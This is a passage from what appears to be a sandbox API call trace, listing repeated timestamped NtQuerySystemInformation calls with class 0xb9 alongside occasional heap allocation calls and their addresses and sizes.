ResultLength=0x0) [0187.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.284] GetProcessHeap () returned 0x27fc8db0000 [0187.284] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5a) returned 0x27fc9873240 [0187.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.286] GetProcessHeap () returned 0x27fc8db0000 [0187.286] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x2c) returned 0x27fc8e5b480 [0187.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.288] GetProcessHeap () returned 0x27fc8db0000 [0187.288] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x2c) returned 0x27fc8e5b840 [0187.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.290] GetProcessHeap () returned 0x27fc8db0000 [0187.290] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x2c) returned 0x27fc8e5b880 [0187.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.293] GetProcessHeap () returned 0x27fc8db0000 [0187.293] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x2e) returned 0x27fc8e5b540 [0187.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.295] GetProcessHeap () returned 0x27fc8db0000 [0187.295] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5c) returned 0x27fc98732b0 [0187.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.298] GetProcessHeap () returned 0x27fc8db0000 [0187.298] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x22) returned 0x27fc8e55790 [0187.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.301] GetProcessHeap () returned 0x27fc8db0000 [0187.301] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x6) returned 0x27fc8e2a330 [0187.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.303] NtQuerySystemInformation (SystemInformationClass=0xb9, 